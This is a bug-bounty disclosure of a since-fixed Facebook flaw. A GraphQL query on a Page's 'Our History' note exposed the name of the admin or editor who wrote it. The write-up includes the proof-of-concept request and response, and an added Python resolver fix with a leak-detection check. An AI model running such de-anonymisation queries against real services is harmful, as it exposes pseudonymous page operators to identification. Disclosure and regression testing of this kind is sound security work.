The identity of a Facebook Page admin is meant to be a secret part of the "Facebook Page". Facebook Pages have a "Story" feature, called "Our History". This is actually a normal Facebook Note, in which "Our History" is the note title and the description is the "Body" part.
If a Page admin or Page editor creates this note, it also discloses his name instead of the page name, because a user created it. That is the bug in this scenario: it should have returned only the "Page Name".
Here is how the flaw was discovered through a "GraphQL" query.
Author: Philippe Harewood.
Proof of Concept:
1) Request:
GET /v2.12/graphql?q=nodes(page-id){page_story{from,published_document{document_owner}}} HTTP/1.1
Host: graph.facebook.com
2) Response:
{
  "page-id": {
    "page_story": {
      "from": {
        "name": "Page Name"
      },
      "published_document": {
        "document_owner": {
          "name": "Admin or Editor User Name"
        }
      }
    }
  }
}

Impact:
This could have let a malicious user derive the name of a page admin or editor that last authored or edited the ‘Our story’ on any chosen page. Note: the attack only works for pages that have ‘Our story’ feature authored/edited.
Source: philippeharewood.com
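The fix the write-up asks for (return only the page name) can be expressed as a resolver change plus a regression check over the response shape shown above. This is an added example, not code from Facebook or from the original author; the `Note` type, the resolver functions, the role table and the sample names are hypothetical, and letting role holders still see the author is an assumption.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Note:
    page_id: str
    page_name: str      # identity the public should see
    author_name: str    # user who created or last edited the note

def owner_vulnerable(note, viewer_id, page_roles):
    # Behaviour described in the write-up: the authoring user goes to anyone.
    return {"name": note.author_name}

def owner_hardened(note, viewer_id, page_roles):
    # Assumption: only accounts holding a role on the page may see the author.
    if viewer_id in page_roles.get(note.page_id, set()):
        return {"name": note.author_name}
    return {"name": note.page_name}

def build_response(note, viewer_id, page_roles, resolve_owner):
    # Same shape as the response shown in the write-up.
    return {note.page_id: {"page_story": {
        "from": {"name": note.page_name},
        "published_document": {
            "document_owner": resolve_owner(note, viewer_id, page_roles)},
    }}}

def find_owner_leaks(response):
    """Return node ids whose document_owner differs from page_story.from."""
    leaks = []
    for node_id, node in response.items():
        story = (node or {}).get("page_story") or {}  # page without a story
        shown = (story.get("from") or {}).get("name")
        doc = story.get("published_document") or {}
        owner = (doc.get("document_owner") or {}).get("name")
        if owner is not None and owner != shown:
            leaks.append(node_id)
    return leaks

# Constructed sample data, not real accounts.
NOTE = Note(page_id="1001", page_name="Example Page", author_name="Example Editor")
ROLES = {"1001": {"editor-7"}}

if __name__ == "__main__":
    for resolver in (owner_vulnerable, owner_hardened):
        resp = build_response(NOTE, "anonymous-viewer", ROLES, resolver)
        print(resolver.__name__, find_owner_leaks(resp))
```

Running `find_owner_leaks` against responses fetched as a viewer with no page role makes the disclosure a testable regression rather than something caught only by manual review.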